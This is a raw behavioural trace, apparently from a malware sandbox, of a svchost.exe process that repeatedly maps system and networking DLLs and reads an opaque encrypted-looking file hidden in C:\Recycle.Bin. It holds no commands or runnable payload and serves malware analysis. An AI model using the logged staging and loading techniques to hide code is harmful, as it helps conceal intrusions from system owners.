Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2077956876
Thread created PID: 1100 TID: 1128 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2077961783
Thread delayed Time: 0 TID: 4392 success or wait 2077964057
System info queried Type: BasicInformation success or wait 2077964233
System info queried Type: ProcessorInformation success or wait 2077964544
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2077964951
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2077966200
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2077966853
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 990000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2077968961
System info queried Type: BasicInformation success or wait 2077969792
System info queried Type: ProcessorInformation success or wait 2077970090
Thread created PID: 1100 TID: 1164 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2077973186
Thread created PID: 1100 TID: 1652 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2077975911
Thread delayed Time: 0 TID: 4392 success or wait 2077978313
Thread delayed Time: 0 TID: 4392 success or wait 2077978713
System info queried Type: BasicInformation success or wait 2077979196
System info queried Type: ProcessorInformation success or wait 2077979497
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2077979904
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2077981026
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2077981671
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078002369
System info queried Type: BasicInformation success or wait 2078003196
System info queried Type: ProcessorInformation success or wait 2078003496
System info queried Type: BasicInformation success or wait 2078005662
System info queried Type: ProcessorInformation success or wait 2078005951
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078006411
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2078007558
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078008224
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078010253
System info queried Type: BasicInformation success or wait 2078011069
System info queried Type: ProcessorInformation success or wait 2078011365
System info queried Type: BasicInformation success or wait 2078013498
System info queried Type: ProcessorInformation success or wait 2078013787
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078014191
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2078015306
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078015971
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078018063
System info queried Type: BasicInformation success or wait 2078018875
System info queried Type: ProcessorInformation success or wait 2078019172
System info queried Type: BasicInformation success or wait 2078021517
System info queried Type: ProcessorInformation success or wait 2078021806
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078022212
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2078023325
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078023992
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078026076
System info queried Type: BasicInformation success or wait 2078026888
System info queried Type: ProcessorInformation success or wait 2078027184
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2078029724
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2078032008
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2078033449
System info queried Type: BasicInformation success or wait 2078051188
System info queried Type: ProcessorInformation success or wait 2078051498
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078051917
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2078053073
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078054050
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2078054373
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2078055262
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: A10000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2078056151
System info queried Type: BasicInformation success or wait 2078057040
System info queried Type: ProcessorInformation success or wait 2078057346
System info queried Type: BasicInformation success or wait 2078059564
System info queried Type: ProcessorInformation success or wait 2078059858
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078060273
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078061405
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078062324
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078062642
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078063572
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078064454
System info queried Type: BasicInformation success or wait 2078065279
System info queried Type: ProcessorInformation success or wait 2078065581
System info queried Type: BasicInformation success or wait 2078068160
System info queried Type: ProcessorInformation success or wait 2078068455
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078068867
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078069998
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078070672
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078070987
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078071866
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078072745
System info queried Type: BasicInformation success or wait 2078073614
System info queried Type: ProcessorInformation success or wait 2078073916
System info queried Type: BasicInformation success or wait 2078076600
System info queried Type: ProcessorInformation success or wait 2078076894
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078077309
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078078441
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078079122
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078079437
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078080318
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078081200
System info queried Type: BasicInformation success or wait 2078082024
System info queried Type: ProcessorInformation success or wait 2078082326
System info queried Type: BasicInformation success or wait 2078085345
System info queried Type: ProcessorInformation success or wait 2078085639
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078086054
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078087181
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078087856
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078088169
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078089044
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078089921
System info queried Type: BasicInformation success or wait 2078090743
System info queried Type: ProcessorInformation success or wait 2078091044
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2078093663
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2078095582
System info queried Type: BasicInformation success or wait 2078107193
System info queried Type: ProcessorInformation success or wait 2078107499
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078107915
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078109050
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078109728
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078110045
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078111034
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078111832
System info queried Type: BasicInformation success or wait 2078112667
System info queried Type: ProcessorInformation success or wait 2078112969
System info queried Type: BasicInformation success or wait 2078115666
System info queried Type: ProcessorInformation success or wait 2078115961
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078116376
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078117508
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078118186
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078118500
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078119380
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078120260
System info queried Type: BasicInformation success or wait 2078121089
System info queried Type: ProcessorInformation success or wait 2078121390
System info queried Type: BasicInformation success or wait 2078124044
System info queried Type: ProcessorInformation success or wait 2078124378
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078124796
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078125919
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078126589
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078126905
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078127783
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078128665
System info queried Type: BasicInformation success or wait 2078129489
System info queried Type: ProcessorInformation success or wait 2078129791
System info queried Type: BasicInformation success or wait 2078132576
System info queried Type: ProcessorInformation success or wait 2078132870
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078133283
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078134411
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078135124
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078135442
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078136320
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078137202
System info queried Type: BasicInformation success or wait 2078138027
System info queried Type: ProcessorInformation success or wait 2078138329
System info queried Type: BasicInformation success or wait 2078140984
System info queried Type: ProcessorInformation success or wait 2078141278
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078141691
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078142819
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078143483
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078143797
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078144721
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078145602
System info queried Type: BasicInformation success or wait 2078146524
System info queried Type: ProcessorInformation success or wait 2078146828
System info queried Type: BasicInformation success or wait 2078149414
System info queried Type: ProcessorInformation success or wait 2078149594
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078150444
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078151578
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078152247
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078152564
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078153445
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078154327
System info queried Type: BasicInformation success or wait 2078155198
System info queried Type: ProcessorInformation success or wait 2078155501
System info queried Type: BasicInformation success or wait 2078158146
System info queried Type: ProcessorInformation success or wait 2078158440
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078158857
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2078159983
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2078160649
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2078160963
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2078161841
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: A10000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2078162719
System info queried Type: BasicInformation success or wait 2078163425
System info queried Type: ProcessorInformation success or wait 2078163726
System info queried Type: BasicInformation success or wait 2078166562
System info queried Type: ProcessorInformation success or wait 2078166856
File opened Path: c:\windows\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2078167268
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2078168405
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2078169382
